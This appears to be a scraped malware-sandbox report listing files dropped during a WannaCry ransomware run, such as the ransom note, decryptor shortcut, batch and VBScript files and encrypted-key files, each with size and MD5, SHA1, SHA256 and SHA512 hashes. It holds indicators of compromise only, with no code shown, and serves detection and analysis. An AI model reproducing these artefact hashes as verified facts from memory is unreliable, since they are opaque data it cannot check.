7a388b7be4648447dc8e16a155a4029fe7bab8c6816d4d16ae58a6e911bed7501c209e200ab626fb35d0aa67df7d7a1d9b442ae34aa47d088b17c2b6cc8a8e59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
addd87639ebfd6a4795fedc2fa0c1c65

SHA1
bc9751a1d672cf2c95aacd9726ccd27dec35ded9

SHA256
4aeab96e343738de8a8ced816a8cd735c175e4e1974cfae67648f74b1c74bd54

SHA512
96418c9acfac08d5e7a113f9c7bd39e801edea99bfbc40e18678eb79787be98829446010a4d35963dee34e265d2aebe4b00c01cb7c3b472e962f3fa167f58883

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
9bdd7e2fc4e7e65e08a280500088c2bc

SHA1
3eedfcfb5f05b2ba2a3957752f74692102fe925a

SHA256
36c5764f754e198602aab2500902cfbd9d72cbc40ffb62e8c3afe68719c4d5bf

SHA512
19d34aa780c39353fb9a6c6fc4641a3de184b2f9a093e53aff742bcc6aeff02c0164e940fbd8090373b1f89a6dcd229e2c1b17595ad4b87db2ddd765ff188119

Download Submit
C:\Users\Admin\Downloads\00000000.eky

Filesize
1KB

MD5
7a35f71ae542d874d962bd93d465b52f

SHA1
f467f5348d2f753cbaa6769a537cae88c8aa4d58

SHA256
ad2136b95a503d5933e3a7088e460f3c829de68f49d0d0387ec7a6880608e0e8

SHA512
31618a8a31cc5ed46b3a9c29d8e16ca5e91d40e5a6a8908f8c7be2517d1484a52e4b832426c72c2a0a1b2d821887cf8c6d67d7ba3ac830ca082926cd38a008db

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
c38f51f56d49f1108469e8763fb876a0

SHA1
a6aae742d09c1f994180582fac65ae63c908a14e

SHA256
abdeddecd148cb50930369855713538f4e7a2224a989f0fd83b3d8b487d29121

SHA512
e0e3d5a4c77aef250cebf9c7bb191eea9609df72d0830c29e2cced558e795411256a15f2bbf9ede5e03f19df68a4d1c1aed77b8ad42185fc3b3a094a6af1ddbd

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
16ff6a255def0c5ecd5e72447782957e

SHA1
066d386905a136387464814b5448036019439538

SHA256
12e4bc7fd7675102196b3dfa3216455e2dc118d067c788e46b8f6dfde272be04

SHA512
b5773cc199d3e4410ac7d1f2fbd91d4dbf86f95c9994d20997f2bf5b6059dc15a3800384805b00cb4861340f0de6e822cea3311c6b30d913944610d1ede9d307

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
26d4fbaf1cd61764b5f284f94709e4f6

SHA1
ac97bbe384b2378dfd486f6e83e37ebd01ea7612

SHA256
0c43bae25def78c3bc6662f5625864085a47917de7452cbc99f844a5f9697a0d

SHA512
7bf99f6fca1c5a303b1a29edfe47b9402d3e53275a7e38dd380eec867d3be8654b3628f0201e50229595c66721230575ed253113990c7018077314211fd4e43a

Download Submit
C:\Users\Admin\Downloads\72641718384235.bat

Filesize
318B

MD5
a261428b490a45438c0d55781a9c6e75

SHA1
e9eefce11cefcbb7e5168bfb8de8a3c3ac45c41e

SHA256
4288d655b7de7537d7ea13fdeb1ba19760bcaf04384cd68619d9e5edb5e31f44

SHA512
304887938520ffcc6966da83596ccc8688b7eace9572982c224f3fb9c59e6fb2dcaa021a19d2aae47346e954c0d0d8145c723b7143dece11ac7261dc41ba3d40

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 997774.crdownload

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier

Filesize
126B

MD5
946000863d65d2a078d28c27b803ac48

SHA1
c44f40970f0263dfcc1518f9063d6e86bd103f7a

SHA256
817b07d4ee7866ca3ae5be5cf26208ef6f4018ccc1913ce679a2c161425760c3

SHA512
0c364f4e14861a1a73e321fd4501e9ee4d5d8627223255706f12f2861dbfba553f4ab4ffd447bd738fc93abec14813dcd47e31ef1c9c97221d7a7d37f16a692c

Download Submit
C:\Users\Admin\Downloads\c.vbs

Filesize
201B

MD5
02b937ceef5da308c5689fcdb3fb12e9

SHA1
fa5490ea513c1b0ee01038c18cb641a51f459507

SHA256
5d57b86aeb52be824875008a6444daf919717408ec45aff4640b5e64610666f1

SHA512
843eeae13ac5fdc216b14e40534543c283ecb2b6c31503aba2d25ddd215df19105892e43cf618848742de9c13687d21e8c834eff3f2b69a26df2509a6f992653

Download Submit
C:\Users\Admin\Downloads\c.wry

Filesize
628B

MD5
f1b644cc6713eb919e772a40447526d8

SHA1
80934478312bfb15c83bd08ba3a2c26743a80711

SHA256
38f5ea876de6ff9dd72867060e048262ca98936782d42dd20da3ecc506440680

SHA512
3a193b6de8f71e7f0d54780463b5e397161a87ed1446a3c74b43bc3212575d3fde0bbcc6c0f38103a3d558fb8f5bc2ae0560b2020d65b9f5ec300869178e8be2

Download Submit
C:\Users\Admin\Downloads\m.wry

Filesize
42KB

MD5
980b08bac152aff3f9b0136b616affa5

SHA1
2a9c9601ea038f790cc29379c79407356a3d25a3

SHA256
402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

SHA512
100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
\??\pipe\LOCAL\crashpad_3152_EAWZCFQJHTOWEDKX

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2004-79-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download